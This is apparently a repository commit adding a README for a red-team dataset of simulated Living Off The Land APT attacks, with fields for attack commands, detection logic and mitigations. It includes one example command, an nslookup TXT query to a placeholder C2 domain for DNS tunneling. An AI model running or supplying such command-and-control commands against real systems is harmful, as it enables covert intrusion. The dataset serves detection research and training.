darkknight25 commited on
Commit
9c8c3e5
·
verified ·
1 Parent(s): 6073e42

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +100 -3
README.md CHANGED
@@ -1,3 +1,100 @@
1
- ---
2
- license: mit
3
- ---
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ license: mit
3
+ task_categories:
4
+ - text-generation
5
+ language:
6
+ - en
7
+ tags:
8
+ - cybersecurity
9
+ - APT
10
+ - redteam
11
+ pretty_name: sunnythakur
12
+ size_categories:
13
+ - n<1K
14
+ ---
15
+ LOTL APT Red Team Dataset
16
+ Overview
17
+ The LOTL APT Red Team Dataset is a comprehensive collection of simulated Advanced Persistent Threat (APT) attack scenarios leveraging Living Off The Land (LOTL) techniques. Designed for cybersecurity researchers, red teamers, and AI/ML practitioners, this dataset focuses on advanced tactics such as DNS tunneling, Command and Control (C2), data exfiltration, persistence, and defense evasion using native system tools across Windows, Linux, macOS, and cloud environments. Each entry aligns with the MITRE ATT&CK framework, providing detailed attack commands, detection logic, mitigation strategies, and AI training prompts to enhance threat detection models.
18
+ The dataset is structured in JSONL format, optimized for AI training, and includes 500 unique entries (as of May 2025) simulating multi-stage APT attacks with dynamic fuzzing for realism. It aims to challenge detection systems by incorporating obscure utilities, unconventional methods, and obfuscation techniques.
19
+ Dataset Description
20
+ The dataset contains simulated LOTL-based APT attack scenarios, with each entry including:
21
+ ```
22
+ id: Unique identifier for the attack scenario.
23
+ tactic: MITRE ATT&CK tactic (e.g., Command and Control, Exfiltration).
24
+ technique: MITRE ATT&CK technique ID and name (e.g., T1071.004: Application Layer Protocol: DNS).
25
+ threat: Description of the attack (e.g., "Using nslookup with TXT records for DNS tunneling C2").
26
+ command: Fuzzed command simulating the attack (e.g., nslookup -type=TXT <random>.c2cmd.<random>.com).
27
+ detection: Detection logic (e.g., tshark -Y 'dns.qry.type == 16').
28
+ mitigation: Mitigation strategies (e.g., Restrict nslookup: icacls nslookup.exe /deny Everyone:RX).
29
+ references: Relevant MITRE ATT&CK and CWE links.
30
+ ai_training_prompt: Guidance for training AI models to detect the attack (e.g., "Train AI to detect DNS tunneling via nslookup TXT queries by analyzing query frequency").
31
+ ```
32
+ Key Features
33
+
34
+ 500 unique entries covering DNS tunneling, C2, exfiltration, persistence, and defense evasion.
35
+ Dynamic fuzzing for randomized domains, payloads, and intervals to simulate real-world APTs.
36
+ MITRE ATT&CK alignment for standardized threat modeling.
37
+ AI-optimized with detailed prompts for training detection models.
38
+ Cross-platform coverage (Windows, Linux, macOS, cloud).
39
+ Obscure tools (e.g., dnscmd, wevtutil, launchctl) and novel techniques (e.g., DNS SRV records for C2).
40
+
41
+
42
+
43
+
44
+ Install Dependencies (for parsing/analyzing JSONL):pip install pandas jsonlines
45
+
46
+
47
+
48
+ Usage
49
+ The dataset can be used for:
50
+
51
+ Threat Hunting: Analyze commands and detection logic to improve SIEM rules.
52
+ AI/ML Training: Use ai_training_prompt fields to train models for detecting DNS tunneling and C2.
53
+ Red Team Exercises: Simulate APT attacks to test blue team defenses.
54
+ Research: Study LOTL techniques and develop new mitigation strategies.
55
+ ```
56
+ Example: Parsing the Dataset
57
+ import jsonlines
58
+ import pandas as pd
59
+
60
+ # Load JSONL dataset
61
+ data = []
62
+ with jsonlines.open('lotl_apt_redteam_dataset.jsonl') as reader:
63
+ for obj in reader:
64
+ data.append(obj)
65
+
66
+ # Convert to DataFrame
67
+ df = pd.DataFrame(data)
68
+ print(df[['id', 'tactic', 'technique', 'threat']].head())
69
+
70
+ Example: Filtering DNS Tunneling Scenarios
71
+ grep '"technique":"T1071.004' lotl_apt_redteam_dataset.jsonl | wc -l
72
+ ```
73
+ Contribution Guidelines
74
+ We welcome contributions to expand the dataset with new LOTL techniques, detection methods, or AI training prompts. To contribute:
75
+
76
+ Fork the repository.
77
+ Create a new branch (git checkout -b feature/new-technique).
78
+ Add new entries to lotl_apt_redteam_dataset.jsonl following the existing schema.
79
+ Ensure commands are unique, fuzzed, and aligned with MITRE ATT&CK.
80
+ Submit a pull request with a clear description of changes.
81
+
82
+ Contribution Checklist
83
+
84
+ Validate JSONL format using a linter (e.g., jsonlint).
85
+ Include MITRE ATT&CK and CWE references.
86
+ Provide detailed ai_training_prompt for AI model training.
87
+ Avoid duplicating existing entries (check id and command).
88
+
89
+ License
90
+ This project is licensed under the MIT License. See the LICENSE file for details.
91
+ Contact
92
+ For questions or feedback, contact the project maintainers at <[email protected] .
93
+ Acknowledgments
94
+
95
+ MITRE ATT&CK for the threat framework.
96
+ CWE for vulnerability references.
97
+ Contributors to open-source cybersecurity tools and research.
98
+
99
+
100
+